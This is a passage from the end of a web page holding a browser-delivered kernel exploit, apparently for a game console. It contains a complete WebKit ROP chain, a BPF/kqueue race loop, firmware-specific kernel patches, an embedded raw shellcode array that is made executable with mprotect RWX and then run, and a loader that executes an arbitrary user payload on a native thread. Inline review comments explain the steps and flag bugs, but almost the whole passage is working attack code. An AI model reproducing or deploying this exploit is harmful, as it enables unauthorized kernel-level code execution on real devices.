    krop.count=16;
    // kpatch(offset, qword): *(base + offset) = qword, where base is the
    // qword the chain stashes at [kscratch] (loaded via pop rax / mov rax,
    // [rax]). kpatch2(offset, offset2): *(base + offset) = base + offset2.
    // Negative offsets are passed as two's-complement int64s. The patched
    // values are firmware-specific kernel patches; not interpreted here.
    var kpatch=function(offset, qword){krop.push(g.pop_rax); krop.push(kscratch); krop.push(g.mov_rax__rax__); krop.push(g.pop_rsi); krop.push(offset); krop.push(g.add_rax_rsi); krop.push(g.pop_rsi); krop.push(qword); krop.push(g.mov__rax__rsi);};
    var kpatch2=function(offset, offset2){krop.push(g.pop_rax); krop.push(kscratch); krop.push(g.mov_rax__rax__); krop.push(g.pop_rsi); krop.push(offset); krop.push(g.add_rax_rsi); krop.push(g.mov_rdi_rax); krop.push(g.pop_rax); krop.push(kscratch); krop.push(g.mov_rax__rax__); krop.push(g.pop_rsi); krop.push(offset2); krop.push(g.add_rax_rsi); krop.push(g.mov__rdi__rax);};
    // Scratch area doubles as a fake frame: gadget pointers at +1056/+64 and
    // a self-pointer at +24.
    p.write8(kscratch.add32(1056), g.pop_rdi); p.write8(kscratch.add32(64), g.pop_rax); p.write8(kscratch.add32(24), kscratch);
    krop.push(g.pop_rdi); krop.push(kscratch.add32(24)); krop.push(g.mov_rbp_rsp);
    var rboff=topofchain - krop.count * 8 + 40;
    // Adjust the saved return address found rboff bytes up the frame by +762.
    krop.push(o2wk(2566497)); krop.push(g.pop_rax); krop.push(rboff); krop.push(g.add_rdi_rax); krop.push(g.mov_rax__rdi__); krop.push(g.pop_rsi); krop.push(762); krop.push(g.add_rax_rsi); krop.push(g.mov__rdi__rax);
    var shellbuf=p.malloc32(4096);
    // [kscratch] = rax - the base every kpatch is relative to, and the value
    // the main loop tests to see whether this chain executed.
    krop.push(g.pop_rdi); krop.push(kscratch); krop.push(g.mov__rdi__rax);
    // [kscratch+8] = rax + 808116, then jump there; [kscratch+16] = the rax
    // that comes back.
    krop.push(g.pop_rsi); krop.push(808116); krop.push(g.add_rax_rsi); krop.push(g.pop_rdi); krop.push(kscratch.add32(8)); krop.push(g.mov__rdi__rax); krop.push(g.jmp_rax);
    krop.push(g.pop_rdi); krop.push(kscratch.add32(16)); krop.push(g.mov__rdi__rax);
    // rdx = rax & 0xFFFFFFFF_FFFEFFFF (clears bit 16), then call
    // [kscratch+8] + 9 with rax = rdx.
    krop.push(g.pop_rsi); krop.push(new int64(4294901759, 4294967295)); krop.push(g.and_rax_rsi); krop.push(g.mov_rdx_rax);
    krop.push(g.pop_rax); krop.push(kscratch.add32(8)); krop.push(g.mov_rax__rax__); krop.push(g.pop_rsi); krop.push(9); krop.push(g.add_rax_rsi); krop.push(g.mov_rdi_rax); krop.push(g.mov_rax_rdx); krop.push(g.jmp_rdi);
    // Save the original qword at base+221338 to kscratch+816 before
    // patching it.
    krop.push(g.pop_rax); krop.push(kscratch); krop.push(g.mov_rax__rax__); krop.push(g.pop_rsi); krop.push(221338); krop.push(g.add_rax_rsi); krop.push(g.mov_rax__rax__); krop.push(g.pop_rdi); krop.push(kscratch.add32(816)); krop.push(g.mov__rdi__rax);
    kpatch(221338, new int64(2425420344, 2425393296));
    kpatch(20169540, shellbuf);
    kpatch(new int64(4293816070, 4294967295), new int64(184, 3297329408));
    kpatch(new int64(4293470503, 4294967295), new int64(0, 1082624841));
    kpatch(new int64(4293470533, 4294967295), new int64(2425388523, 1922076816));
    kpatch(new int64(4294769332, 4294967295), new int64(934690871, 826654769));
    kpatch(828366, new int64(233, 2336788480));
    kpatch(1329844, new int64(2428747825, 2425393296));
    kpatch(new int64(15789236, 0), new int64(2, 0));
    kpatch2(new int64(15789244, 0), new int64(4293548276, 4294967295));
    kpatch(new int64(15789276, 0), new int64(0, 1));
    // Call [kscratch+8] + 9 again with rax = the value saved at kscratch+16,
    // then return through a WebKit address with kscratch+4096 on the stack.
    krop.push(g.pop_rax); krop.push(kscratch.add32(8)); krop.push(g.mov_rax__rax__); krop.push(g.pop_rsi); krop.push(9); krop.push(g.add_rax_rsi); krop.push(g.mov_rdi_rax); krop.push(g.pop_rax); krop.push(kscratch.add32(16)); krop.push(g.mov_rax__rax__); krop.push(g.jmp_rdi);
    krop.push(o2wk(380345)); krop.push(kscratch.add32(4096));
    // kq receives the kqueue descriptor; kev is one struct kevent. Assuming
    // the FreeBSD layout: ident = sock (dwords 0-1), dword 2 = filter|flags
    // = 0x0001FFFF (filter -1 = EVFILT_READ, flags 1 = EV_ADD), fflags = 1,
    // data = 5.
    // NOTE(review): `kev.backing[0]=sock` stores an int64 object into a
    // Uint32Array; it is converted via int64.toString() (hex) and Number(),
    // which equals the descriptor only for values below 10 (hex == decimal).
    // For a larger descriptor it silently becomes 0. Use `.low` as fd/fd1 do.
    var kq=p.malloc32(16); var kev=p.malloc32(256);
    kev.backing[0]=sock; kev.backing[2]=131071; kev.backing[3]=1; kev.backing[4]=5;
    // Machine code (dwords) copied into shellbuf and executed once the race
    // has won; not analysed here.
    var shcode=[35817, 2425393152, 2425393296, 2425393296, 8567125, 2303246336, 1096172005, 1398030677, 2303275535, 3149957588, 256, 551862601, 1220806985, 9831821, 2370371584, 4265616532, 2370699263, 3767542964, 2370633744, 1585456300, 2169045059, 1265721540, 277432321, 4202255, 698, 3867757568, 524479, 3607052544, 960335176, 1207959552, 3224487561, 2211839809, 3698655723, 1103114587, 1096630620, 2428722526, 1032669269, 4294967160, 2303260209, 15293925, 1207959552, 770247, 2303262720, 3271888842, 1818324331, 979595116, 628633632, 1815490864, 2648, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];
    for (var i=0; i < shcode.length; i++){shellbuf.backing[i]=shcode[i];};
    // Main-thread race loop. Each iteration is one ROP chain that does
    // (FreeBSD syscall numbering assumed):
    //   [kq] = kqueue()                                  (362)
    //   write interrupt1 -> loop1: wake the worker so it re-installs the
    //     valid filter concurrently
    //   ioctl(fd, 0x8010427B, bpf_valid_prog)            (54)
    //   kevent(kq, kev, 1, 0, 0)                         (363)
    //   ioctl(fd1, 0x8010427B, bpf_spray_prog)           (54)
    //   close(kq)                                        (6)
    // and then checks whether the kernel chain wrote [kscratch]. On success
    // the shellcode is made executable (74 = mprotect, prot 7 = RWX) and
    // called. race.count=0 reuses the chain buffer without clearing it;
    // run() clears it afterwards.
    // NOTE(review): there is no attempt limit; if the race never wins the
    // page spins here forever behind the spinner, with no feedback.
    start1();
    while (1){race.count=0; race.push(s[362]); race.push(g.pop_rdi); race.push(kq); race.push(g.mov__rdi__rax); race.push(g.ret); race.push(g.ret); race.push(g.ret); race.push(g.ret); race.push_write8(loop1, interrupt1); race.push(g.pop_rdi); race.push(fd); race.push(g.pop_rsi); race.push(2148549243); race.push(g.pop_rdx); race.push(bpf_valid_prog); race.push(s[54]); race.push(g.pop_rax); race.push(kq); race.push(g.mov_rax__rax__); race.push(g.mov_rdi_rax); race.push(g.pop_rsi); race.push(kev); race.push(g.pop_rdx); race.push(1); race.push(g.pop_rcx); race.push(0); race.push(g.pop_r8); race.push(0); race.push(s[363]); race.push(g.pop_rdi); race.push(fd1); race.push(g.pop_rsi); race.push(2148549243); race.push(g.pop_rdx); race.push(bpf_spray_prog); race.push(s[54]); race.push(g.pop_rax); race.push(kq); race.push(g.mov_rax__rax__); race.push(g.mov_rdi_rax); race.push(s[6]); race.run(); if (kscratch.backing[0] !=0){p.syscall(74, shellbuf, 16384, 7); p.fcall(shellbuf); break;};};
  };
  // ---- user payload ---------------------------------------------------------
  // `###` is the template marker, presumably replaced by the generator with
  // `var payload=[...];` (dwords). The first 1337 sentinel in it is replaced
  // with the chosen configuration value, the payload is copied into
  // payloadbuf, made executable (mprotect RWX, 64 KiB), mlockall'd and run
  // on a fresh native thread.
  // NOTE(review): parseInt() is called without a radix; the <select> only
  // offers "1337", "1" and "0", so it is safe as written. payloadbuf.backing
  // has 32768 dword slots (malloc32 adds 64 KiB of slack) and the copy loop
  // has no length check, so a longer payload is silently truncated by the
  // typed array - and only the first 65536 bytes are made executable.
  var createThread=webKitBase.add32(7836560);
  var payloadbuf=p.malloc32(16384);###
  if (payload.indexOf(1337) > -1){payload[payload.indexOf(1337)]=parseInt(window.configuration);}
  for (var i=0; i < payload.length; i++){payloadbuf.backing[i]=payload[i];};
  p.syscall(74, payloadbuf, 65536, 7); p.syscall(324, 1); p.fcall(createThread, payloadbuf, 0, p.sptr("payload"));
  done();
}
</script></body></html>